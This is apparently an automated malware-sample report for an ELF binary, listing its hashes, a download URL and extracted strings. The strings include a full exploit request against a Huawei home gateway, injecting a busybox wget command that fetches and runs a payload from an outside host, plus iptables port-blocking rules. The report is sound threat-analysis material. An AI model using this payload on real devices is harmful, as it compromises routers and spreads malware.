Sample details: 4f93d9439bfcaeb9ccb0dcc2c10aedda --

Hashes
MD5: 4f93d9439bfcaeb9ccb0dcc2c10aedda
SHA1: f31e7538d0d4d18951bef598fd47e0689b89943c
SHA256: 39e6a100c0da4194701acf5bced08a459d0bb9641e85c821dca61a6b21cab1dd
SSDEEP: 768:itoJ42jq9NlxGYQ73ZvPEiKZBs/jX8rTEPO+Fcjt+pWOA:itm42jSNlQYQ7ZXEFI/Fzqt7OA
Details
File Type: ELF
Yara Hits
Source
http://185.62.190.159/bins/spc.idopoc
Strings
		POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g okay.gorillamc.party -l /tmp/ifipoc -r /bins/mips.idopoc; /bin/busybox chmod 777 * /tmp/ifipoc; /tmp/ifipoc huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
iptables -A INPUT -p tcp --destination-port 23 -j DROP
iptables -A INPUT -p tcp --destination-port 37215 -j DROP
*+)#0+XB
M$65&6SRS=
M$65&6SRS>B
B*+)#0+b
SPQVWT
?/bin/sh
/dev/null
.shstrtab
.rodata
.ctors
.dtors